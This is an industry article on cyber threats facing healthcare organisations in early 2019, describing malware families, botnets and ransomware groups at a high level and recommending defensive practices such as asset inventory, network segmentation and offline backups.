Malware, adware, trojans and other pests from the past and future rear their heads.
Cybercriminal organizations have targeted the global healthcare industry from the moment it first began to place patient medical, PII and billing information into a connected network.
The phenomenon has only grown since.
During the first five months of 2019, healthcare organizations continued to bear the brunt of this pattern of continuous attack. These ranged from targeted attacks involving phishing and customized ransomware to the use of more traditional tactics such as common exploits, malware and botnets. The examples below serve as a takeaway so that we can learn from what has come before.
Two of the top exploits identified from January to May of 2019 were older vulnerabilities, allowing attackers to do things from gaining initial access into environments to even enabling an attacker to execute arbitrary code, including malicious malware. A variety of recent campaigns using these and also newer vulnerabilities have been used to target healthcare facilities.
Malware is used to gain network access, as well as to perform malicious tasks once a network perimeter has been breached. Of the top malware variants found during this analysis, the two fell outside traditional malware techniques. Adware and riskware were among the top malware detected. While many perceive this sort of malware as merely a nuisance, many variants also drop additional malware through a strategy known as malvertising, which injects legitimate online advertising with malware to infect unsuspecting end users.
The other is the Android/Generic.AP malware that targets Android mobile devices. This trojan, if successfully installed on a phone, can establish remote access to its infrastructure, capture keystrokes, collect system information, download/upload files, perform denial-of-service attacks and run/terminate processes. In healthcare networks with BYOD policies, compromised phones can become a conduit for introducing additional malware and gaining unauthorized access.
Of the top 10 botnets affecting healthcare networks, five are mainstays across all industries. Three of the most worrisome are Gh0st RAT, Bladabindi and WINNTI.
Gh0st RAT contains a remote administration tool that includes the typical abilities to take full control of the victim machine, log keystrokes, log webcam and microphone data, and more. Bladabindi is also known as njRAT, and it possesses similar capabilities to Gh0stRAT, but it can also steal stored credentials such as usernames/passwords and other PII. It’s important to note that last year, a fileless version was identified in the wild with wormlike capabilities, and it could propagate by infecting thumb drives. WINNTI contains a trojan that has been used in many targeted campaigns by cybercriminal groups such as Winnti and Axiom.
In addition to traditional exploit, malware and botnet activities, there has also been a spike in targeted attacks. The Orangeworm threat actor group has been identified deploying an older trojan called Kwampirs that targets the systems of MRI and X-ray machines and siphons their configuration data.
The SamSam ransomware, which combines the destructive payload of ransomware with more targeted keyboard attacks, has been targeting the healthcare industry for the last year or so. While many types of ransomware remain relatively unsophisticated, we are now seeing additional capabilities being developed and additional malware being included with the ransomware payload, which should worry security administrators.
Many attacks target older vulnerabilities to gain initial access into the network or to distribute malware. Best practices involve a four-tier process:
Ensure you have the visibility within your network to identify where your vulnerabilities are and the right information to access the overall risk to the organization. To do this, make sure you know the following:
Mission-Critical Systems — It’s crucial that you understand your mission-critical business processes and the systems those processes utilize. In healthcare, it is imperative that your strategy aligns with protection of critical revenue-generating service lines, or clinical care areas that cannot withstand downtime.
Cyber Assets — You need a dynamically updated inventory of every asset on your network, including the operating system, applications, data, services, processes, configuration settings and vulnerabilities of each asset. Pay particular attention to services and areas of the business where remote access is prevalent, for example telemedicine or remote clinics.
Network Infrastructure — Get familiar with your extended network topology and where and how all applications, workflows and data move. Given the high use of SaaS applications in any given environment, be sure to understand your partner’s cloud infrastructure and security controls.
Medical Devices — Devices and other sorts of analysis, monitoring or treatment systems connected to the network need to be particularly identified and secured. Many of these devices are mobile, so they need to be tracked as they move among hospital departments and, in some cases, patients’ homes.
Many attacks leverage trusted tools already on your internal systems, a process called “living off the land.” Some of these are administrative tools, so malicious activity can be misinterpreted as normal. Understand how such tools function and take measures to harden their functions, restrict their access and baseline normal usage so unexpected activity triggers an alert.
Attackers target mobile devices with corporate access (email and other business applications) to get into the network. However, detecting a phishing email or malicious activity on a mobile device is often more difficult than on a traditional laptop. In fact, cybercriminals are renowned for intentionally launching malware during peak workforce “in transit” timeframes such as lunch and traffic hour, understanding they will get a better response rate! Ensure that mobile threats are included in your user awareness training program.
These include such things as:
Attackers that gain network access continue to drive deeper into the network to complete whatever goal they are trying to achieve. To reduce the overall impact of these efforts, implement intent-based segmentation in your network. This sort of “continual resistance” can limit lateral movement, slow down attacks and even discourage attackers — giving you more time to detect and mitigate these attacks.
Ransomware is one of the most common payloads of targeted attacks. Proper preparation includes offline backups, scanning backed-up data and running restoration drills so recovery can be fast and painless. On the business side, talk through these scenarios with your head of communications, operations and finance - and have a plan at the ready.
As long as the global healthcare Industry manages and stores personal, medical and PII data on patients, they will continue to be a prime target for cybercriminals. However, such attacks not only put data at risk but also critical services and even patient lives as it relates to cyber attacks on medical devices. It is essential that the security teams responsible for the care and protection of the data and devices strung across healthcare campuses continuously remain aware of the latest threat trends, practice essential security hygiene and take the steps outlined above to establish and maintain a baseline of security for patients and staff alike.
Sonia Arista is a seasoned Information Security and Technology specialist with over 20 years’ experience. At Fortinet, she is responsible for the go-to-market strategy, solutions and sales growth for the company’s healthcare and life sciences business.
Get the best insights in digital health directly to your inbox.